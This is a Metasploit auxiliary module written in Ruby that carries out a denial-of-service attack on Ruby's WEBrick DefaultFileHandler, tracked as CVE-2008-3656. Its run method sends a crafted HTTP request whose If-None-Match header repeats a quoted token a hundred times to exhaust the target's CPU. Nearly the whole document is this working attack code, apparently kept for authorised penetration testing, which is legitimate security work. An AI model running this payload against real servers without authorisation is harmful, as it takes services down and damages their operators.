1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',
15
        'Description' => %q{
16
          The WEBrick::HTTP::DefaultFileHandler in WEBrick in
17
          Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7
18
          to 1.8.7-p71, and 1.9 to r18423 allows for a DoS
19
          (CPU consumption) via a crafted HTTP request.
20
        },
21
        'Author' => 'kris katterjohn',
22
        'License' => MSF_LICENSE,
23
        'References' => [
24
          [ 'BID', '30644'],
25
          [ 'CVE', '2008-3656'],
26
          [ 'OSVDB', '47471' ],
27
          [ 'URL', 'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']
28
        ],
29
        'DisclosureDate' => '2008-08-08',
30
        'Notes' => {
31
          'Stability' => [CRASH_SERVICE_DOWN],
32
          'SideEffects' => [],
33
          'Reliability' => []
34
        }
35
      )
36
    )
37

38
    register_options([
39
      OptString.new('URI', [ true, 'URI to request', '/' ])
40
    ])
41
  end
42

43
  def run
44
    o = {
45
      'uri' => normalize_uri(datastore['URI']),
46
      'headers' => {
47
        'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
48
      }
49
    }
50

51
    c = connect(o)
52
    c.send_request(c.request_raw(o))
53

54
    print_status("Request sent to #{rhost}:#{rport}")
55
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
56
    print_status("Couldn't connect to #{rhost}:#{rport}")
57
  rescue ::Timeout::Error, ::Errno::EPIPE => e
58
    vprint_error(e.message)
59
  end
60
end
61

62